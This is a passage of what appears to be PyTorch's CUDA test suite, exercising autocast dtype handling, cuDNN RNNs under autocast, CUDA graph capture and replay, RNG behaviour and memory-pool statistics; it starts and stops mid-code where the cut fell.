# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
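# ("Python-side autocasting" here just means casting the inputs to run_as_type with the
#  cast() helper above and calling the op with autocast disabled; the result should match
#  what dispatcher-level autocast produced bitwise.)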
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Checks that autocast does not keep re-caching the same parameters
# (and leak memory) when executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
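# a is 1000 ones and the captured region adds 1 to it ten times, so after one replay
# b should be all 11s: 1000 * 11 == 11000.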
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
            # If the graphs share a mempool, g2's capture should have reused c's memory for f. We replayed g2
            # then g1, so we expect g1's captured "e = c + 3" to have mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
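    # Illustrative sketch of the two pool-sharing idioms the successive-graph
    # tests above use (variable names are assumptions):
    #
    #     handle = torch.cuda.graph_pool_handle()
    #     g0.capture_begin(handle)        # share via an explicit handle...
    #     g0.capture_end()
    #     g1.capture_begin(g0.pool())     # ...or by reusing g0's pool directly
    #     g1.capture_end()
    #
    # As test_graph_three_successive demonstrates, graphs that share a pool must
    # be replayed in capture order, otherwise a replay can observe memory that a
    # later capture reused (the e/f check above).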
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
